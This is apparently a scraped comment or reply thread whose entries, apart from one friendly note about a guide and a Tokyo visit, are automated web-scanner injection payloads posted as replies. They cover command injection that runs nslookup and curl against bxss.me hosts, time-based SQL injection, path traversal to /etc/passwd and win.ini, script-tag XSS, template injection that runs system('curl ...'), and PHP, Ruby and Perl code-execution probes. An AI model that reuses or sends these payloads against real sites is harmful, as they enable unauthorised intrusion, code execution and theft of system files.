;(nslookup -q=cname hitzvjbjkijmgf3f33.bxss.me||curl hitzvjbjkijmgf3f33.bxss.me)|(nslookup -q=cname hitzvjbjkijmgf3f33.bxss.me||curl hitzvjbjkijmgf3f33.bxss.me)&(nslookup -q=cname hitzvjbjkijmgf3f33.bxss.me||curl hitzvjbjkijmgf3f33.bxss.me)
re: kanivour
${@print(md5(31337))}
re: kanivour
|(nslookup${IFS}-q${IFS}cname${IFS}hitgmiuymngtg616d8.bxss.me||curl${IFS}hitgmiuymngtg616d8.bxss.me)
re: kanivour
${@print(md5(31337))}\
re: kanivour
&(nslookup${IFS}-q${IFS}cname${IFS}hitnumvwkzhrk1a93b.bxss.me||curl${IFS}hitnumvwkzhrk1a93b.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitnumvwkzhrk1a93b.bxss.me||curl${IFS}hitnumvwkzhrk1a93b.bxss.me)&`'
re: kanivour
'"()
re: kanivour
'.print(md5(31337)).'
re: kanivour
'&&sleep(27*1000)*edjofb&&'
re: kanivour
"&&sleep(27*1000)*smevux&&"
re: kanivour
'||sleep(27*1000)*ctdmln||'
re: kanivour
HttP://bxss.me/t/xss.html?%00
re: kanivour
"||sleep(27*1000)*pjuogu||"
re: kanivour
bxss.me/t/xss.html?%00
re: kanivour
"+"A".concat(70-3).concat(22*4).concat(107).concat(76).concat(102).concat(67)+(require"socket"
Socket.gethostbyname("hityk"+"dvnmnwtr947cc.bxss.me.")[3].to_s)+"
re: kanivour
'+'A'.concat(70-3).concat(22*4).concat(115).concat(82).concat(118).concat(71)+(require'socket'
Socket.gethostbyname('hitdr'+'nallalhb7f58b.bxss.me.')[3].to_s)+'
re: kanivour
'A'.concat(70-3).concat(22*4).concat(122).concat(68).concat(100).concat(77)+(require'socket'
Socket.gethostbyname('hitcq'+'fwyysqczc8744.bxss.me.')[3].to_s)
re: kanivour
replies
re: kanivour
replies�
re: kanivour
'"
re: kanivour
replies/.
re: kanivour
<!--
re: kanivour
'"()&%<zzz><ScRiPt >HptJ(9142)</ScRiPt>
re: kanivour
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitkxfgzizqqa69249.bxss.me")}}
re: kanivour
'"()&%<zzz><ScRiPt >HptJ(9705)</ScRiPt>
re: kanivour
9943565
re: kanivour
sFmwMyvs
re: kanivour
*1
re: kanivour
*1
re: kanivour
*1
re: kanivour
*1
re: kanivour
-1 OR 5*5=25 --
re: kanivour
-1 OR 5*5=26 --
re: kanivour
-1 OR 5*5=25
re: kanivour
-1 OR 5*5=26
re: kanivour
*if(now()=sysdate(),sleep(15),0)
re: kanivour
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: kanivour
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: kanivour
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: kanivour
-1; waitfor delay '0:0:15' --
re: kanivour
-1); waitfor delay '0:0:15' --
re: kanivour
-1 waitfor delay '0:0:15' --
re: kanivour
NwuMiaDB'; waitfor delay '0:0:15' --
re: kanivour
-1 OR 764=(SELECT 764 FROM PG_SLEEP(15))--
re: kanivour
-1) OR 142=(SELECT 142 FROM PG_SLEEP(15))--
re: kanivour
-1)) OR 655=(SELECT 655 FROM PG_SLEEP(15))--
re: kanivour
e7Xjh1tJ' OR 535=(SELECT 535 FROM PG_SLEEP(15))--
re: kanivour
UBd2ahKC') OR 12=(SELECT 12 FROM PG_SLEEP(15))--
re: kanivour
pBFCAsBA')) OR 87=(SELECT 87 FROM PG_SLEEP(15))--
re: kanivour
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: kanivour
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: kanivour
'||(select 1 from (select pg_sleep(15))x)||'
re: kanivour
''||(select 1 from (select pg_sleep(15))x)||''
re: kanivour
'"
re: kanivour
@@E20Yj
re: kanivour
(select 198766*667891)
re: kanivour
(select 198766*667891 from DUAL)
Thanks to saito-san for the wonderful guide. Hi and happy to see all the familiar faces. I will be in Tokyo with my family next May. Happy to meet you guys if you all are free during the period.
re: Yee How
uwCmxrrR
re: Yee How
1*
re: Yee How
1*
re: Yee How
1*
re: Yee How
1*
re: Yee How
-1 OR 2+203-203-1=0+0+0+1
re: Yee How
-1 OR 3+203-203-1=0+0+0+1
re: Yee How
if(now()=sysdate(),sleep(15),0)
re: Yee How
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Yee How
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Yee How
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Yee How
-1; waitfor delay '0:0:15' --
re: Yee How
-1); waitfor delay '0:0:15' --
re: Yee How
1 waitfor delay '0:0:15' --
re: Yee How
ppFWKtMd'; waitfor delay '0:0:15' --
re: Yee How
-5 OR 235=(SELECT 235 FROM PG_SLEEP(15))--
re: Yee How
-5) OR 711=(SELECT 711 FROM PG_SLEEP(15))--
re: Yee How
-1)) OR 78=(SELECT 78 FROM PG_SLEEP(15))--
re: Yee How
ZhwiQ4Rj' OR 453=(SELECT 453 FROM PG_SLEEP(15))--
re: Yee How
W6VRhCTN') OR 135=(SELECT 135 FROM PG_SLEEP(15))--
re: Yee How
DP4Yz4D1')) OR 710=(SELECT 710 FROM PG_SLEEP(15))--
re: Yee How
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Yee How
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Yee How
'||(select 1 from (select pg_sleep(15))x)||'
re: Yee How
''||(select 1 from (select pg_sleep(15))x)||''
re: Yee How
1'"
re: Yee How
@@BujbT
re: Yee How
1BYstYGqgYO
re: Yee How
response.write(9348636*9039043)
re: Yee How
'+response.write(9348636*9039043)+'
re: Yee How
"+response.write(9348636*9039043)+"
re: Yee How
%0abcc:074625.67-22251.67.f13a5.19990.2@bxss.me
re: Yee How
to@example.com>%0d%0abcc:074625.67-22252.67.f13a5.19990.2@bxss.me
re: Yee How
../../../../../../../../../../../../../../etc/passwd
re: Yee How
<esi:include src="http://bxss.me/rpb.png"/>
re: Yee How
../../../../../../../../../../../../../../windows/win.ini
re: Yee How
file:///etc/passwd
re: Yee How
../../../../../../../../../../../../../../../proc/version
re: Yee How
${9999622+9999814}
re: Yee How
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Yee How
../../../../../../../../../../etc/passwd%00.jpg
re: Yee How
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Yee How
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Yee How
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Yee How
echo tqcscg$()\ hgftbb\nz^xyu||a #' &echo tqcscg$()\ hgftbb\nz^xyu||a #|" &echo tqcscg$()\ hgftbb\nz^xyu||a #
re: Yee How
/etc/passwd
re: Yee How
&echo cednuj$()\ flomnr\nz^xyu||a #' &echo cednuj$()\ flomnr\nz^xyu||a #|" &echo cednuj$()\ flomnr\nz^xyu||a #
re: Yee How
%2fetc%2fpasswd
re: Yee How
|echo hokzks$()\ bjbsqi\nz^xyu||a #' |echo hokzks$()\ bjbsqi\nz^xyu||a #|" |echo hokzks$()\ bjbsqi\nz^xyu||a #
re: Yee How
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Yee How
)
re: Yee How
(nslookup hitdwrbdogfhq053df.bxss.me||perl -e "gethostbyname('hitdwrbdogfhq053df.bxss.me')")
re: Yee How
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Yee How
$(nslookup hiturvhyuzfki3765b.bxss.me||perl -e "gethostbyname('hiturvhyuzfki3765b.bxss.me')")
re: Yee How
!(()&&!|*|*|
re: Yee How
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Yee How
&nslookup hitzulgbkiafh3f35a.bxss.me&'\"`0&nslookup hitzulgbkiafh3f35a.bxss.me&`'
re: Yee How
^(#$!@#$)(()))******
re: Yee How
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Yee How
&(nslookup hitnyqelcbvoed37a0.bxss.me||perl -e "gethostbyname('hitnyqelcbvoed37a0.bxss.me')")&'\"`0&(nslookup hitnyqelcbvoed37a0.bxss.me||perl -e "gethostbyname('hitnyqelcbvoed37a0.bxss.me')")&`'
re: Yee How
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Yee How
|(nslookup hitebkkendjnw88322.bxss.me||perl -e "gethostbyname('hitebkkendjnw88322.bxss.me')")
re: Yee How
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Yee How
`(nslookup hitkuzrhpwfnece824.bxss.me||perl -e "gethostbyname('hitkuzrhpwfnece824.bxss.me')")`
re: Yee How
;(nslookup hitrqfjbhwfsv35b22.bxss.me||perl -e "gethostbyname('hitrqfjbhwfsv35b22.bxss.me')")|(nslookup hitrqfjbhwfsv35b22.bxss.me||perl -e "gethostbyname('hitrqfjbhwfsv35b22.bxss.me')")&(nslookup hitrqfjbhwfsv35b22.bxss.me||perl -e "gethostbyname('hitrqfjbhwfsv35b22.bxss.me')")
re: Yee How
file:///etc/passwd
re: Yee How
/\../\../\../\../\../\../\../etc/passwd
re: Yee How
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Yee How
/WEB-INF/web.xml
re: Yee How
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Yee How
C:\WINDOWS\system32\drivers\etc\hosts
re: Yee How
Http://bxss.me/t/fit.txt
re: Yee How
../../../../../../../../../../windows/win.ini%00.jpg
re: Yee How
http://bxss.me/t/fit.txt%3F.jpg
re: Yee How
/../../../../../../../../../../boot.ini
re: Yee How
'.gethostbyname(lc('hituu'.'epedjaygc35c9.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(67).chr(117).chr(87).'
re: Yee How
/etc/shells
re: Yee How
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Yee How
".gethostbyname(lc("hitzg"."rqajbsha0c39f.bxss.me."))."A".chr(67).chr(hex("58")).chr(101).chr(89).chr(117).chr(72)."
re: Yee How
c:/windows/win.ini
re: Yee How
..\..\..\..\..\..\..\..\windows\win.ini
re: Yee How
bxss.me
re: Yee How
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Yee How
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Yee How
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Yee How
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Yee How
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Yee How
HttP://bxss.me/t/xss.html?%00
re: Yee How
WEB-INF/web.xml
re: Yee How
"+"A".concat(70-3).concat(22*4).concat(117).concat(81).concat(116).concat(89)+(require"socket"
Socket.gethostbyname("hitso"+"jhjqdkis4a938.bxss.me.")[3].to_s)+"
re: Yee How
bxss.me/t/xss.html?%00
re: Yee How
WEB-INF\web.xml
re: Yee How
'+'A'.concat(70-3).concat(22*4).concat(114).concat(82).concat(120).concat(88)+(require'socket'
Socket.gethostbyname('hityz'+'rmryjedj4c796.bxss.me.')[3].to_s)+'
re: Yee How
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Yee How
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Yee How
'"
re: Yee How
';print(md5(31337));$a='
re: Yee How
<!--
re: Yee How
";print(md5(31337));$a="
re: Yee How
${@print(md5(31337))}
re: Yee How
${@print(md5(31337))}\
re: Yee How
'.print(md5(31337)).'
re: Yee How
1
re: Yee How
1
re: Yee How
-1 OR 2+762-762-1=0+0+0+1 --
re: Yee How
-1 OR 3+762-762-1=0+0+0+1 --
re: Yee How
-1 OR 2+971-971-1=0+0+0+1
re: Yee How
-1 OR 3+971-971-1=0+0+0+1
re: Yee How
-1' OR 2+361-361-1=0+0+0+1 --
re: Yee How
-1' OR 3+361-361-1=0+0+0+1 --
re: Yee How
-1' OR 2+705-705-1=0+0+0+1 or '2Czf3giC'='
re: Yee How
-1' OR 3+705-705-1=0+0+0+1 or '2Czf3giC'='
re: Yee How
-1" OR 2+309-309-1=0+0+0+1 --
re: Yee How
-1" OR 3+309-309-1=0+0+0+1 --
re: Yee How
if(now()=sysdate(),sleep(15),0)
re: Yee How
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Yee How
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Yee How
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Yee How
1T6T57IGK0
re: Yee How
response.write(9236165*9068052)
re: Yee How
'+response.write(9236165*9068052)+'
re: Yee How
"+response.write(9236165*9068052)+"
re: Yee How
../../../../../../../../../../../../../../etc/passwd
re: Yee How
<esi:include src="http://bxss.me/rpb.png"/>
re: Yee How
${9999717+10000394}
re: Yee How
../../../../../../../../../../../../../../windows/win.ini
re: Yee How
file:///etc/passwd
re: Yee How
../
re: Yee How
)
re: Yee How
!(()&&!|*|*|
re: Yee How
^(#$!@#$)(()))******
re: Yee How
redirtest.acx
re: Yee How
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: Yee How
echo cnlfom$()\ ttkohy\nz^xyu||a #' &echo cnlfom$()\ ttkohy\nz^xyu||a #|" &echo cnlfom$()\ ttkohy\nz^xyu||a #
re: Yee How
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: Yee How
'.gethostbyname(lc('hityx'.'ajxmjqmvcffd5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(66).chr(117).chr(74).'
re: Yee How
&echo djtzmj$()\ zzrolm\nz^xyu||a #' &echo djtzmj$()\ zzrolm\nz^xyu||a #|" &echo djtzmj$()\ zzrolm\nz^xyu||a #
re: Yee How
/etc/shells
re: Yee How
".gethostbyname(lc("hitlh"."fwfwztxjd8512.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(72).chr(98).chr(70)."
re: Yee How
|echo bsdfuk$()\ sinnnv\nz^xyu||a #' |echo bsdfuk$()\ sinnnv\nz^xyu||a #|" |echo bsdfuk$()\ sinnnv\nz^xyu||a #
re: Yee How
../../../../../../../../../../../../../../etc/shells
re: Yee How
gethostbyname(lc('hittr'.'liovjzqxbeb88.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(80).chr(122).chr(86)
re: Yee How
expr 9000823295 - 927193
re: Yee How
c:/windows/win.ini
re: Yee How
(nslookup -q=cname hittooecfixof98268.bxss.me||curl hittooecfixof98268.bxss.me))
re: Yee How
bxss.me
re: Yee How
$(nslookup -q=cname hithvmzajyfts12872.bxss.me||curl hithvmzajyfts12872.bxss.me)
re: Yee How
Http://bxss.me/t/fit.txt
re: Yee How
&nslookup -q=cname hitjjrtbxjnra66398.bxss.me&'\"`0&nslookup -q=cname hitjjrtbxjnra66398.bxss.me&`'
re: Yee How
http://bxss.me/t/fit.txt?.jpg
re: Yee How
ctime
sleep
p0
(I30
tp1
Rp2
.
re: Yee How
&(nslookup -q=cname hitoimzqalfjj8280a.bxss.me||curl hitoimzqalfjj8280a.bxss.me)&'\"`0&(nslookup -q=cname hitoimzqalfjj8280a.bxss.me||curl hitoimzqalfjj8280a.bxss.me)&`'
re: Yee How
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Yee How
|(nslookup -q=cname hitmgepaarofy4f83f.bxss.me||curl hitmgepaarofy4f83f.bxss.me)
re: Yee How
';print(md5(31337));$a='
re: Yee How
`(nslookup -q=cname hitnwhbziucfu6a637.bxss.me||curl hitnwhbziucfu6a637.bxss.me)`
re: Yee How
";print(md5(31337));$a="
re: Yee How
;(nslookup -q=cname hitzflgaixyxrf2409.bxss.me||curl hitzflgaixyxrf2409.bxss.me)|(nslookup -q=cname hitzflgaixyxrf2409.bxss.me||curl hitzflgaixyxrf2409.bxss.me)&(nslookup -q=cname hitzflgaixyxrf2409.bxss.me||curl hitzflgaixyxrf2409.bxss.me)
re: Yee How
${@print(md5(31337))}
re: Yee How
|(nslookup${IFS}-q${IFS}cname${IFS}hitcwtqsjthej7b4f6.bxss.me||curl${IFS}hitcwtqsjthej7b4f6.bxss.me)
re: Yee How
${@print(md5(31337))}\
re: Yee How
'"()
re: Yee How
&(nslookup${IFS}-q${IFS}cname${IFS}hitamezbvnyux79f61.bxss.me||curl${IFS}hitamezbvnyux79f61.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitamezbvnyux79f61.bxss.me||curl${IFS}hitamezbvnyux79f61.bxss.me)&`'
re: Yee How
'.print(md5(31337)).'
re: Yee How
'&&sleep(27*1000)*yekxuw&&'
re: Yee How
"&&sleep(27*1000)*glhvec&&"
re: Yee How
'||sleep(27*1000)*gsgmsr||'
re: Yee How
"||sleep(27*1000)*udlsyy||"
re: Yee How
HttP://bxss.me/t/xss.html?%00
re: Yee How
bxss.me/t/xss.html?%00
re: Yee How
"+"A".concat(70-3).concat(22*4).concat(103).concat(87).concat(115).concat(76)+(require"socket"
Socket.gethostbyname("hitpt"+"dcneufxi2c528.bxss.me.")[3].to_s)+"
re: Yee How
replies
re: Yee How
'+'A'.concat(70-3).concat(22*4).concat(122).concat(82).concat(102).concat(69)+(require'socket'
Socket.gethostbyname('hithr'+'zvtszxbka8a6f.bxss.me.')[3].to_s)+'
re: Yee How
replies�
re: Yee How
'A'.concat(70-3).concat(22*4).concat(117).concat(75).concat(118).concat(87)+(require'socket'
Socket.gethostbyname('hityt'+'sqtickbr1895a.bxss.me.')[3].to_s)
re: Yee How
replies/.
re: Yee How
'"
re: Yee How
<!--
re: Yee How
'"()&%<zzz><ScRiPt >IoKG(9368)</ScRiPt>
re: Yee How
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitxlsuwknspv1f3b4.bxss.me")}}
re: Yee How
'"()&%<zzz><ScRiPt >IoKG(9964)</ScRiPt>
re: Yee How
9747843
re: Yee How
BYT4mU2D
re: Yee How
*1
re: Yee How
*1
re: Yee How
*1
re: Yee How
*1
re: Yee How
-1 OR 5*5=25 --
re: Yee How
-1 OR 5*5=26 --
re: Yee How
-1 OR 5*5=25
re: Yee How
-1 OR 5*5=26
re: Yee How
*if(now()=sysdate(),sleep(15),0)
re: Yee How
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: Yee How
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: Yee How
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Yee How
-1; waitfor delay '0:0:15' --
re: Yee How
-1); waitfor delay '0:0:15' --
re: Yee How
-1 waitfor delay '0:0:15' --
re: Yee How
PMErMd6h'; waitfor delay '0:0:15' --
re: Yee How
